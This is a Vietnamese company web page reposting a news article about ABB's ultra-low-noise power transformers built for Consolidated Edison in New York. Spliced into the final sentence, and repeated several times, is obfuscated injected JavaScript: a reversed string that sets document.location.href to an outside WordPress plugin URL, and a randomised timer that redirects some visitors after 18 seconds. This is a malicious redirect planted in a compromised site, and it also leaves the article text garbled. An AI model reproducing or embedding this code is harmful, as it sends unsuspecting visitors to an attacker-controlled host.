CÔNG TY TNHH - SX - TM - DV NHẬT LONG
NHAT LONG PLASTIC CO., LTD
envi

Công nghệ máy biến áp độ ồn siêu thấp của ABB

ABB vừa phát triển dòng sản phẩm máy biến áp điện độ ồn siêu thấp giúp công ty điện Consolidated Edison (ConEd) đáp ứng những quy định về tiếng ồn mới được thi hành của thành phố New York. Loại máy biến áp điện mới của ABB được coi là bền nhất trên thế giới.

Sản phẩm ra đời là kết quả từ sự thành công của nỗ lực nghiên cứu và phát triển trong nhiều năm của đội ngũ kỹ sư và nhà khoa học ABB tại Mỹ, Thụy Điển và Đức.

Dự án cũng liên quan đến việc phát triển các phương pháp đo độ ồn siêu thấp hợp lý tại các thành phần tần số riêng biệt. Công nghệ mới được phát triển đã thiết lập những điểm chuẩn công nghiệp mới về sự phát tiếng ồn từ máy biến áp.

Ngoài việc đáp ứng những tiêu chuẩn nghiêm ngặt về tiếng ồn của ConEd, ABB cũng đảm bảo rằng những máy biến áp này đáp ứng những giới hạn chặt chẽ về trọng lượng, chiều rộng và chiều cao để được phép vận chuyển ở Manhattan. Sản phẩm cũng phải tuân theo những yêu cầu về kỹ thuật giống như quá tải vượt quá 200% và những giới hạn cực kì nghiêm ngặt về dải trở kháng của máy biến áp.Công nghệ máy biến áp tiếng ồn siêu thấp của ABB hiện đang được sử dụng để sản xuất ra những thiết kế tốt nhất cho những máy biến áp tiếng ồn thấp và siêu thấp cho các khu vực thành thị nhạy với tiếng ồn khác trên toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toàn thế giới.

Trích từ VnExpress

Tham khảo

Máy phát điện siêu nhỏ